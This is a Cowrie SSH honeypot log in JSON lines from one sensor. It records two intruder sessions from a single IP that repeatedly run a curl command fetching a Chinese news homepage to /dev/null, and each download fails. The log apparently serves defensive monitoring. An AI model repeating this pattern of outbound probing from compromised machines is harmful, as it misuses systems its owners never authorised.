{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.578068Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.583635Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.585197Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.589504Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.591367Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.624254Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.625367Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.626987Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.629097Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.630337Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.632654Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.663797Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.665163Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.670328Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.671561Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.675388Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.676554Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.704115Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.705317Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.708591Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.711031Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.724310Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.777970Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.779773Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.783433Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.784726Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.824628Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.826020Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.828617Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.829701Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.845892Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.849293Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.885152Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.886934Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.888713Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.890077Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.892507Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.893811Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.922415Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.924921Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.927654Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.928864Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.932978Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.934111Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.959372Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.960733Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.965918Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.967250Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:11.973385Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:11.974624Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.007623Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.010141Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.011475Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.016233Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.018766Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.020284Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.045450Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.071061Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.080460Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.081673Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.091093Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.092381Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.114100Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.115513Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.151011Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.152543Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.154372Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.160756Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.161778Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.191245Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.216095Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.217453Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.223205Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.224673Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.227576Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.228835Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.261118Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.262304Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.272547Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.273864Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.274994Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.299404Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.312713Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.314067Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.333704Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.335065Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.366646Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.368262Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.384200Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.385557Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.411438Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.412803Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.429681Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.431022Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.447167Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.448542Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.456201Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.457425Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.473757Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.474750Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.492236Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.495163Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.497360Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.499753Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.521404Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.522816Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.536441Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.541610Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.556642Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.558088Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.584616Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.585907Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.587528Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.588723Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.614970Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.616382Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.632370Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.633846Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.643569Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.644411Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.657436Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.658387Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.687727Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.688779Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.693310Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.695403Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.697862Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:12.698979Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:12.731048Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
